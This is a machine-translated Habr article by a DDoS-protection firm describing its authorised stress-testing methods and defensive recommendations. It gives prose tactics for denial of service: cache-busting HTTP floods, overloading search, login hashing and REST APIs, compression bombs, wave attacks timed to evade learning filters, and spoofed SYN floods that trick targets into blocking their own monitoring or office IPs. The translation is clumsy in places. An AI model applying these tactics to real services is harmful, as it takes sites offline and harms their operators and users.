DDoS to help: how we conduct stress and stress tests

Variti develops protection against bots and DDoS attacks, and also conducts stress and stress testing. At the HighLoad ++ 2018 conference, we told how to secure resources from various types of attacks. In short: isolate parts of the system, use cloud services and CDNs and update regularly. But without specialized companies with protection, you still can not cope :)

Before reading the text, you can familiarize yourself with short abstracts on the conference website .
And if you do not like to read or just want to watch the video, write our report below under the spoiler.

Video of the report

Many companies already know how to do stress testing, but not everyone does stress testing. Some of our customers think their site is invulnerable, because they have a highload system and it protects well against attacks. We show that this is not entirely true.
')
Of course, before conducting the tests, we get permission from the customer, signed and stamped, and with our help, a DDoS attack cannot be done on anyone. Testing is carried out at a time chosen by the customer, when the attendance of his resource is minimal, and problems with access will not affect customers. In addition, since the testing process can always go wrong, we have constant contact with the customer. This allows not only to report on the achieved results, but also to change something during testing. When testing is completed, we always compile a report in which we point out the deficiencies found and give recommendations on how to remedy the weaknesses of the site.

How we are working

When testing, we emulate a botnet. Since we work with clients that are not located in our networks, so that the test does not end in the first minute due to the operation of limits or protection, we submit the load not from one IP, but from our own subnet. Plus, to create a significant load, we have our own fairly powerful test server.

Postulates

A lot does not mean good

The less load we can bring to life to failure, the better. If you manage to make the site stop functioning from one request per second, or even from one request per minute, that's fine. Because according to the law of meanness, users or attackers accidentally fall into this particular vulnerability.

Partial failure is better than full

We always advise making systems heterogeneous. Moreover, it is necessary to separate them at the physical level, and not only by containerization. In the case of physical separation, even if something fails on the site, it is likely that it will not stop working completely, and users will have access to at least some of the functionality.

Proper architecture is the foundation of sustainability

Resilience of the resource and its ability to withstand attacks and loads must be laid at the design stage, in fact at the stage of drawing the first flowcharts in a notebook. Because if fatal errors creep in, it is possible to correct them in the future, but it is very difficult.

Good should be not only the code, but also the config

Many people think that a good development team is a guarantee of service resiliency. A good development team is really necessary, but there must also be good maintenance, good DevOps. That is, we need specialists who correctly configure Linux and the network, write the configs correctly in nginx, set up limits and so on. Otherwise, the resource will work well only on the test, and in production at some point everything will break.

Differences between stress and stress testing

Load testing allows you to identify the limits of the functioning of the system. Stress testing is aimed at finding the weak points of the system and is used to break this system and see how it will behave in the process of failure of certain parts. In this case, the nature of the load usually remains unknown to the customer before the start of stress testing.

Distinctive features of L7 attacks

The types of load we usually divide into loads at the level of L7 and L3 & 4. L7 is a load at the application level, most often it means only HTTP, we mean any load at the TCP level.

L7 attacks have certain distinguishing features. First, they come directly into the application, that is, it is unlikely that they will be able to reflect them with network tools. Such attacks involve logic, and due to this, they are very efficient and, with little traffic, consume CPU, memory, disk, database and other resources.

HTTP Flood

In the case of any attack, the load is easier to create than to handle, and in the case of L7 this is also true. Attack traffic is not always easy to distinguish from legitimate, and most often it is possible to do it by frequency, but if everything is planned correctly, then by logs it is impossible to understand where the attack is and where legitimate requests are.

As a first example, consider the HTTP Flood attack. It can be seen from the graph that such attacks are usually very powerful, in the example below the peak number of requests exceeded 600 thousand per minute.

HTTP Flood is the easiest way to create load. Usually, some load testing tool is taken for it, for example, ApacheBench, and the request and target are set. With such a simple approach, the probability of running into server caching is great, but it is easy to get around it. For example, adding random lines to a request that will force the server to continually render a fresh page.
Also, do not forget about the user-agent in the process of creating a load. Many user-agents of popular testing tools are filtered by system administrators, and in this case the load may simply not reach the backend. The result can be significantly improved by inserting a more or less valid header from the browser into the request.
Despite the simplicity of the HTTP attack, Flood has its drawbacks. First, to create a load requires large capacity. Secondly, such attacks are very easily detected, especially if they come from the same address. As a result, requests immediately begin to be filtered, either by system administrators, or even at the provider level.

What to look for

To reduce the number of requests per second and at the same time not to lose in efficiency, you need to show a little imagination and explore the site. So, you can load not only the channel or server, but also individual parts of the application, for example, databases or file systems. You can also search for places on the site that make large calculations: calculators, pages with the selection of products and so on. Finally, it often happens that the site has a php script that generates a page of several hundred thousand lines. Such a script also heavily loads the server and can become a target for an attack.

Where to looking for

When we scan a resource before testing, we primarily look, of course, at the site itself. We are looking for all kinds of input fields, heavy files - in general, everything that can create problems for a resource and slows down its work. It helps banal development tools in Google Chrome and Firefox, showing the response time of the page.

We also scan subdomains. For example, there is a certain online store, abc.com, and it has a subdomain admin.abc.com. Most likely, this is an admin panel with authorization, but if you put a load on it, it can create problems for the main resource.

The site can have a subdomain api.abc.com. Most likely, this is a resource for mobile applications. The application can be found on the App Store or Google Play, set up a special access point, prepare the API and register test accounts. The problem is that often people think that everything that is protected by authorization is invulnerable to denial of service attacks. Allegedly, authorization is the best captcha, but it is not. It is easy to make 10-20 test accounts, and by creating them, we get access to complex and undisguised functionality.

Naturally, we are looking at history, robots.txt and WebArchive, ViewDNS, looking for old versions of the resource. Sometimes it happens that the developers rolled out, say, mail2.yandex.net, and the old version, mail.yandex.net, remains. This mail.yandex.net is no longer supported, development resources are not allocated to it, but it continues to consume the database. Accordingly, with the help of the old version, you can effectively use the resources of the backend and all that is behind the layout. Of course, this is not always the case, but we still encounter this quite often.

Naturally, we dissect all the parameters of the request, the structure of the cookie. You can, say, populate a JSON array inside a cookie with some value, create more nesting and make the resource work unreasonably long.

Load search

The first thing that comes to mind when researching a site is to load the database, since almost everyone has a search, and almost all of them, unfortunately, are poorly protected. For some reason, the developers do not pay enough attention to the search. But there is one recommendation - you should not do the same type of requests, because you can encounter caching, as is the case with the HTTP flood.

Making random queries to the database is also not always effective. It is much better to create a list of keywords that are relevant to the search. If you go back to the example of an online store: for example, the site sells automotive tires and allows you to set the radius of the tires, the type of car and other parameters. Accordingly, combinations of relevant words will make the database work in much more complex conditions.

In addition, it is worth using pagination: the search is much more difficult to give the penultimate page of issue than the first. That is, using pagination, you can vary the load a little.

The example below shows the load in the search. It is clear that from the very first second of the test at a speed of ten requests per second, the site went down and did not respond.

If no search?

If there is no search, this does not mean that the site does not contain other vulnerable input fields. This field may be authorization. Now developers like to make complex hashes in order to protect the login database from the attack on the rainbow tables. This is good, but such hashes consume large CPU resources. A large stream of false authorizations leads to a processor failure, and as a result, the site stops working at the output.

The presence on the site of various forms for comments and feedback is a reason to send there very large texts or simply to create a massive flood. Sometimes sites accept attachments, including in gzip format. In this case, we take a file of 1TB in size, using gzip, compress it to a few bytes or kilobytes and send it to the site. Then it is unarchived and a very interesting effect is obtained.

Rest API

I would like to pay a little attention to such popular services as Rest API. Protect Rest API is much more difficult than a regular site. For the Rest API, even banal ways to protect against brute force and other illegitimate activity do not work.

Rest API is very easy to break, because it accesses the database directly. At the same time, the withdrawal of such a service leads to rather serious consequences for the business. The fact is that not only the main site is tied to the Rest API, but also a mobile application, some internal business resources. And if this all falls, then the effect is much stronger than in the case of the failure of a simple site.

Heavy content load

If we are offered to test some usual one-page application, landing page, business card site, which do not have complex functionality, we are looking for heavy content. For example, large images that the server gives, binary files, pdf-documentation, we try to download all this. Such tests load the file system well and clog the channels, and are therefore effective. That is, even if you do not put the server, downloading a large file at low speeds, then you will simply block the channel of the target server and then denial of service will occur.
On the example of such a test, it can be seen that at a speed of 30 RPS the site stopped responding, or issued 500th server errors.

Do not forget about setting up servers. You can often find that a person bought a virtual machine, put Apache there, set everything up by default, placed a php application, and below you can see the result.

Here the load went to the root and was only 10 RPS. We waited 5 minutes and the server crashed. Until the end, however, it is not known why he fell, but there is an assumption that he just overeat memory, and therefore stopped responding.

Wave based

In the past year or two, wave attacks have become quite popular. This is due to the fact that many organizations buy these or other glands to protect against DDoS, which require a certain time to accumulate statistics to start filtering attacks. That is, they do not filter the attack in the first 30-40 seconds, because they accumulate data and learn. Accordingly, in these 30-40 seconds, you can start the site so much that the resource will lie for a long time, until all requests are raked.

In the case of the attack below, there was an interval of 10 minutes, after which a new, modified portion of the attack arrived.

That is, the defense learned, started filtering, but a new, completely different portion of the attack arrived, and the defense started training again. In fact, filtering stops working, protection becomes ineffective, and the site is unavailable.

Wave attacks are characterized by very high values at the peak, it can reach one hundred thousand or a million requests per second, in the case of L7. If we talk about L3 & 4, then there may be hundreds of gigabits of traffic, or, respectively, hundreds of mpps, if you count in packets.

The problem is such attacks in sync. Attacks come from a botnet, and in order to create a very large one-time peak, a high degree of synchronization is required. And this coordination does not always work: sometimes a parabolic peak is obtained at the output, which looks rather pitiful.

Not http uniform

In addition to HTTP at the L7 level, we like to exploit other protocols. As a rule, a regular website, especially a regular web hosting service, has mail protocols and MySQL sticking out. Mail protocols are subject to loads to a lesser degree than databases, but they can also be loaded quite efficiently and receive an overloaded CPU on the server at the output.

We really succeeded with the 2016 SSH vulnerability. Now almost everyone has fixed this vulnerability, but this does not mean that the load cannot be submitted to SSH. Can. Just a huge load of authorizations is served, SSH eats up almost the entire CPU on the server, and then the website develops from one or two requests per second.

Accordingly, these one or two requests for logs can not be distinguished from the legitimate load.
Remains relevant and many connections that we open in the servers. Previously, Apache sinned with it, now nginx is actually sinning with it, because it is often configured by default. The number of connections that nginx can keep open is limited, so we open this number of connections, the new nginx connection no longer accepts, and the site does not work at the output.

Our test cluster has enough CPU to attack SSL handshake. In principle, as practice shows, botnets, too, sometimes love to do it. On the one hand, it is clear that no SSL can not do, because the issuance of Google, ranking, security. On the other hand, SSL, unfortunately, has a problem with the CPU.

L3 & 4

When we talk about an attack on the L3 & 4 levels, we usually talk about a channel-level attack. Such a load is almost always distinguishable from legitimate, if it is not a SYN-flood attack. The problem of SYN-flood attacks for remedies is large. The maximum value of L3 & 4 was 1.5-2 Tbit / s. Such traffic is very difficult to handle even large companies, including Oracle and Google.

SYN and SYN-ACK are packets that are used when establishing a connection. Therefore, SYN-flood and difficult to distinguish from the legitimate load: it is not clear, this is the SYN that came to the installation of the connection, or part of the flood.

UDP flood

Usually intruders do not have the power that we have, so amplification can be used to organize attacks. That is, the attacker scans the Internet and finds either vulnerable or incorrectly configured servers, which, for example, in response to a single SYN packet, respond with three SYN-ACK. Faking the source address from the address of the target server, you can use one packet to increase the power, say, three times, and redirect traffic to the victim.

The problem of amplifications lies in their complex detection. From the last examples we can cite the sensational case of the vulnerable memcached. Plus, now there are a lot of IoT devices, IP cameras, which are also mostly configured by default, and by default they are configured incorrectly, so attackers often make such attacks through such devices.

Difficult SYN flood

SYN-flood, probably the most interesting view of all attacks from the point of view of the developer. The problem is that often system administrators use IP blocking to protect them. Moreover, blocking by IP affects not only system administrators who act on scripts, but, unfortunately, some protection systems that are bought for big money.

Such a method can turn into a disaster, because if the attackers replace the IP addresses, the company will block its own subnet. When the Firewall blocks its own cluster, external interactions will crash at the output, and the resource will break.

Moreover, it is easy to block your own network. If the client’s office has a WI-Fi network, or if the performance of resources is measured using various monitoring systems, then we take the IP address of this monitoring system or office Wi-Fi client, and use it as a source. At the output, the resource seems to be available, but the target IP addresses are blocked. So, the HighLoad conference Wi-Fi network, where a new company product is presented, may be blocked, and this entails certain business and economic costs.

During testing, we cannot use the amplification through memcached by any external resources, because there is an agreement to feed traffic only to authorized IP addresses. Accordingly, we use amplification through SYN and SYN-ACK, when the system responds with two or three SYN-ACK to sending one SYN, and at the output the attack is multiplied two to three times.

Instruments

One of the main tools we use for load at the L7 level is Yandex-tank. In particular, a phantom is used as a gun, plus there are several scripts for generating cartridges and for analyzing the results.

Tcpdump is used for network traffic analysis, Nmap is used for server analysis. To create a load at the L3 & 4 level, OpenSSL and a little proprietary magic with the DPDK library are used. DPDK is an Intel library that allows you to work with the network interface, bypassing the Linux stack, and thereby increases efficiency. Naturally, we use DPDK not only at the L3 & 4 level, but also at the L7 level, because it allows you to create a very high load flow, within a few million requests per second from a single machine.
We also use certain traffic-generators and special tools that we write for specific tests. If we recall the vulnerability for SSH, then the above set it can not be expropriated. If we attack the mail protocol, then we take mail utilities or simply write scripts on them.

findings

As a result, I would like to say:

In addition to the classical load testing, it is necessary to conduct stress testing. We have a real-life example, when a partner subcontractor conducted only load testing. It showed that the resource can withstand regular load. But then a non-standard load appeared, the site visitors began to use the resource a little differently, and at the exit the subcontractor lay down. Thus, it is worth looking for vulnerabilities, even if you are already protected from DDoS attacks.
It is necessary to isolate some parts of the system from others. If you have a search, it should be put on separate machines, that is, not even to the docker. Because if the search or authorization fails, then at least something will continue to work. In the case of an online store, users will continue to find products from the catalog, switch from the aggregator, buy if they are already authorized, or log in via OAuth2.
Do not neglect all sorts of cloud services.
Use CDN not only to optimize network delays, but also as a means of protection against attacks on channel exhaustion and just flooding in statics.
It is necessary to use specialized protection services. You do not defend yourself against L3 & 4 attacks at the channel level, because you most likely simply do not have a sufficient channel. You are also unlikely to fight off the L7 attacks, since they are very large. Plus, the search for small attacks is still the prerogative of special services, special algorithms.
Update regularly. This applies not only to the kernel, but to the SSH daemon, especially if they are open to you. In principle, you need to update everything, because you can hardly track any vulnerabilities yourself.

Source: https://habr.com/ru/post/448626/

All Articles